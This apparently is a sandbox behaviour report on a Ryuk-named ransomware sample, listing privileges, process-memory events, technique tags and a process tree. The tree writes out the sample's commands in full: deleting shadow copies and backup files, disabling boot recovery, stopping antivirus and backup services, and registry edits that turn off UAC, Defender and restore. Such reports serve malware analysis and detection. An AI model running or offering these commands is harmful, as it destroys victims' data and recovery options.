Token: SeBackupPrivilege	3460	wevtutil.exe
Token: SeSecurityPrivilege	3264	wevtutil.exe
Token: SeBackupPrivilege	3264	wevtutil.exe
Token: SeSecurityPrivilege	3736	wevtutil.exe
Token: SeBackupPrivilege	3736	wevtutil.exe
Token: SeSecurityPrivilege	3880	wevtutil.exe
Token: SeBackupPrivilege	3880	wevtutil.exe
Token: SeSecurityPrivilege	3900	wevtutil.exe
Token: SeBackupPrivilege	3900	wevtutil.exe
Token: SeSecurityPrivilege	1356	wevtutil.exe
Token: SeBackupPrivilege	1356	wevtutil.exe
Token: SeSecurityPrivilege	4040	wevtutil.exe
Token: SeBackupPrivilege	4040	wevtutil.exe
Token: SeSecurityPrivilege	3792	wevtutil.exe
Token: SeBackupPrivilege	3792	wevtutil.exe
Token: SeSecurityPrivilege	5148	wevtutil.exe
Token: SeBackupPrivilege	5148	wevtutil.exe
Token: SeSecurityPrivilege	5184	wevtutil.exe
Token: SeBackupPrivilege	5184	wevtutil.exe
Token: SeSecurityPrivilege	5252	wevtutil.exe
Token: SeBackupPrivilege	5252	wevtutil.exe
Token: SeSecurityPrivilege	3716	wevtutil.exe
Token: SeBackupPrivilege	3716	wevtutil.exe
Token: SeSecurityPrivilege	5316	wevtutil.exe
Token: SeBackupPrivilege	5316	wevtutil.exe
Token: SeSecurityPrivilege	5372	wevtutil.exe
Token: SeBackupPrivilege	5372	wevtutil.exe
Token: SeSecurityPrivilege	5408	wevtutil.exe
Token: SeBackupPrivilege	5408	wevtutil.exe
Token: SeSecurityPrivilege	5436	wevtutil.exe
Token: SeBackupPrivilege	5436	wevtutil.exe
Token: SeSecurityPrivilege	5464	wevtutil.exe
Token: SeBackupPrivilege	5464	wevtutil.exe
Token: SeSecurityPrivilege	5484	wevtutil.exe
Token: SeBackupPrivilege	5484	wevtutil.exe
Token: SeSecurityPrivilege	5516	wevtutil.exe
Token: SeBackupPrivilege	5516	wevtutil.exe
Token: SeSecurityPrivilege	5540	wevtutil.exe
Token: SeBackupPrivilege	5540	wevtutil.exe
Token: SeSecurityPrivilege	5568	wevtutil.exe
Token: SeBackupPrivilege	5568	wevtutil.exe
Token: SeSecurityPrivilege	5612	wevtutil.exe
Token: SeBackupPrivilege	5612	wevtutil.exe
Token: SeSecurityPrivilege	5672	wevtutil.exe
Token: SeBackupPrivilege	5672	wevtutil.exe
Token: SeSecurityPrivilege	5684	wevtutil.exe
Token: SeBackupPrivilege	5684	wevtutil.exe
Token: SeSecurityPrivilege	5740	wevtutil.exe
Token: SeBackupPrivilege	5740	wevtutil.exe
Token: SeSecurityPrivilege	5768	wevtutil.exe
Token: SeBackupPrivilege	5768	wevtutil.exe
Token: SeSecurityPrivilege	5800	wevtutil.exe
Token: SeBackupPrivilege	5800	wevtutil.exe
Token: SeSecurityPrivilege	5840	wevtutil.exe
Token: SeBackupPrivilege	5840	wevtutil.exe
Token: SeSecurityPrivilege	5864	wevtutil.exe
Token: SeBackupPrivilege	5864	wevtutil.exe
Token: SeSecurityPrivilege	5884	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2624 wrote to memory of 2876	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	31
PID 2624 wrote to memory of 2876	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	31
PID 2624 wrote to memory of 2876	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	31
PID 2624 wrote to memory of 2988	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	32
PID 2624 wrote to memory of 2988	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	32
PID 2624 wrote to memory of 2988	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	32
PID 2624 wrote to memory of 2508	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	33
PID 2624 wrote to memory of 2508	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	33
PID 2624 wrote to memory of 2508	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	33
PID 2508 wrote to memory of 1724	2508	cmd.exe	34
PID 2508 wrote to memory of 1724	2508	cmd.exe	34
PID 2508 wrote to memory of 1724	2508	cmd.exe	34
PID 2624 wrote to memory of 2592	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	35
PID 2624 wrote to memory of 2592	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	35
PID 2624 wrote to memory of 2592	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	35
PID 2624 wrote to memory of 2216	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	36
PID 2624 wrote to memory of 2216	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	36
PID 2624 wrote to memory of 2216	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	36
PID 2624 wrote to memory of 2180	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	37
PID 2624 wrote to memory of 2180	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	37
PID 2624 wrote to memory of 2180	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	37
PID 2592 wrote to memory of 2192	2592	cmd.exe	38
PID 2592 wrote to memory of 2192	2592	cmd.exe	38
PID 2592 wrote to memory of 2192	2592	cmd.exe	38
PID 2216 wrote to memory of 2224	2216	cmd.exe	39
PID 2216 wrote to memory of 2224	2216	cmd.exe	39
PID 2216 wrote to memory of 2224	2216	cmd.exe	39
PID 2180 wrote to memory of 2440	2180	cmd.exe	40
PID 2180 wrote to memory of 2440	2180	cmd.exe	40
PID 2180 wrote to memory of 2440	2180	cmd.exe	40
PID 2192 wrote to memory of 2372	2192	net.exe	41
PID 2192 wrote to memory of 2372	2192	net.exe	41
PID 2192 wrote to memory of 2372	2192	net.exe	41
PID 2624 wrote to memory of 2892	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	43
PID 2624 wrote to memory of 2892	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	43
PID 2624 wrote to memory of 2892	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	43
PID 2892 wrote to memory of 2896	2892	cmd.exe	44
PID 2892 wrote to memory of 2896	2892	cmd.exe	44
PID 2892 wrote to memory of 2896	2892	cmd.exe	44
PID 2896 wrote to memory of 2908	2896	net.exe	45
PID 2896 wrote to memory of 2908	2896	net.exe	45
PID 2896 wrote to memory of 2908	2896	net.exe	45
PID 2624 wrote to memory of 2856	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	46
PID 2624 wrote to memory of 2856	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	46
PID 2624 wrote to memory of 2856	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	46
PID 2856 wrote to memory of 2196	2856	cmd.exe	47
PID 2856 wrote to memory of 2196	2856	cmd.exe	47
PID 2856 wrote to memory of 2196	2856	cmd.exe	47
PID 2196 wrote to memory of 2704	2196	net.exe	48
PID 2196 wrote to memory of 2704	2196	net.exe	48
PID 2196 wrote to memory of 2704	2196	net.exe	48
PID 2624 wrote to memory of 2188	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	49
PID 2624 wrote to memory of 2188	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	49
PID 2624 wrote to memory of 2188	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	49
PID 2188 wrote to memory of 2860	2188	cmd.exe	50
PID 2188 wrote to memory of 2860	2188	cmd.exe	50
PID 2188 wrote to memory of 2860	2188	cmd.exe	50
PID 2860 wrote to memory of 2880	2860	net.exe	52
PID 2860 wrote to memory of 2880	2860	net.exe	52
PID 2860 wrote to memory of 2880	2860	net.exe	52
PID 2624 wrote to memory of 2724	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	53
PID 2624 wrote to memory of 2724	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	53
PID 2624 wrote to memory of 2724	2624	2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe	53
PID 2724 wrote to memory of 2964	2724	cmd.exe	54

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 8 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4736	Process not Found
5012	Process not Found
2544	attrib.exe
1948	attrib.exe
4632	Process not Found
4628	Process not Found
4964	Process not Found
4676	Process not Found

C:\Users\Admin\AppData\Local\Temp\2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-06_6c2b5d1e5204f83e16265da3600d48e0_ryuk.exe"
1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
  2⤵
  PID:2876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c @echo off
  2⤵
  PID:2988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c chcp 437
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\system32\chcp.com
    chcp 437
    3⤵
    PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2592
- - C:\Windows\system32\net.exe
    net stop "Acronis VSS Provider"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2192
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Acronis VSS Provider"
      4⤵
      PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2216
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2180
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:2440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\system32\net.exe
    net stop " Enterprise Client Service"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2896
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop " Enterprise Client Service"
      4⤵
      PID:2908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Agent"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2856
- - C:\Windows\system32\net.exe
    net stop "Sophos Agent"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Agent"
      4⤵
      PID:2704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Windows\system32\net.exe
    net stop "Sophos AutoUpdate Service"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos AutoUpdate Service"
      4⤵
      PID:2880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Windows\system32\net.exe
    net stop "Sophos Clean Service"
    3⤵
    PID:2964
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Clean Service"
      4⤵
      PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"
  2⤵
  PID:2952
- - C:\Windows\system32\net.exe
    net stop "Sophos Device Control Service"
    3⤵
    PID:2868
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Device Control Service"
      4⤵
      PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"
  2⤵
  PID:2692
- - C:\Windows\system32\net.exe
    net stop "Sophos File Scanner Service"
    3⤵
    PID:2712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos File Scanner Service"
      4⤵
      PID:2768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  2⤵
  PID:2728
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"
  2⤵
  PID:2040
- - C:\Windows\system32\net.exe
    net stop "Sophos Health Service"
    3⤵
    PID:2220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Health Service"
      4⤵
      PID:2576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
  2⤵
  PID:2088
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"
  2⤵
  PID:2360
- - C:\Windows\system32\net.exe
    net stop "Sophos MCS Agent"
    3⤵
    PID:1536
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos MCS Agent"
      4⤵
      PID:3028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\*.bkf C:\Backup*.* C:\backup*.*
  2⤵
  PID:2932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  2⤵
  PID:2924
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"
  2⤵
  PID:1948
- - C:\Windows\system32\net.exe
    net stop "Sophos MCS Client"
    3⤵
    PID:1808
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos MCS Client"
      4⤵
      PID:2684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:1276
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:3000
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"
  2⤵
  PID:2800
- - C:\Windows\system32\net.exe
    net stop "Sophos Message Router"
    3⤵
    PID:3012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Message Router"
      4⤵
      PID:2504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:564
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:1900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:1268
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    PID:752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"
  2⤵
  PID:1136
- - C:\Windows\system32\net.exe
    net stop "Sophos Safestore Service"
    3⤵
    PID:1452
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Safestore Service"
      4⤵
      PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  2⤵
  PID:2100
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:2240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"
  2⤵
  PID:2132
- - C:\Windows\system32\net.exe
    net stop "Sophos System Protection Service"
    3⤵
    PID:2660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos System Protection Service"
      4⤵
      PID:2144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:2128
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:304
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"
  2⤵
  PID:484
- - C:\Windows\system32\net.exe
    net stop "Sophos Web Control Service"
    3⤵
    PID:1644
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Web Control Service"
      4⤵
      PID:968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:828
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:1476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:1464
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"
  2⤵
  PID:1224
- - C:\Windows\system32\net.exe
    net stop "SQLsafe Backup Service"
    3⤵
    PID:2172
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Backup Service"
      4⤵
      PID:2124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:2676
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:1304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"
  2⤵
  PID:1336
- - C:\Windows\system32\net.exe
    net stop "SQLsafe Filter Service"
    3⤵
    PID:2164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Filter Service"
      4⤵
      PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:1624
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"
  2⤵
  PID:1620
- - C:\Windows\system32\net.exe
    net stop "Symantec System Recovery"
    3⤵
    PID:820
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Symantec System Recovery"
      4⤵
      PID:2456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:2160
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"
  2⤵
  PID:884
- - C:\Windows\system32\net.exe
    net stop "Veeam Backup Catalog Data Service"
    3⤵
    PID:1068
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"
      4⤵
      PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:344
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:2668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:268
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "AcronisAgent"
  2⤵
  PID:1484
- - C:\Windows\system32\net.exe
    net stop "AcronisAgent"
    3⤵
    PID:1372
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "AcronisAgent"
      4⤵
      PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:1804
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"
  2⤵
  PID:1964
- - C:\Windows\system32\net.exe
    net stop "AcrSch2Svc"
    3⤵
    PID:1616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "AcrSch2Svc"
      4⤵
      PID:1376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1520
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Antivirus"
  2⤵
  PID:1668
- - C:\Windows\system32\net.exe
    net stop "Antivirus"
    3⤵
    PID:300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Antivirus"
      4⤵
      PID:2340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:284
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:352
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:1692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"
  2⤵
  PID:684
- - C:\Windows\system32\net.exe
    net stop "BackupExecAgentAccelerator"
    3⤵
    PID:1080
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecAgentAccelerator"
      4⤵
      PID:2376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:712
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:2580
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"
  2⤵
  PID:1636
- - C:\Windows\system32\net.exe
    net stop "BackupExecAgentBrowser"
    3⤵
    PID:2076
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecAgentBrowser"
      4⤵
      PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"
  2⤵
  PID:2612
- - C:\Windows\system32\net.exe
    net stop "BackupExecDeviceMediaService"
    3⤵
    PID:1284
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecDeviceMediaService"
      4⤵
      PID:2280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:2520
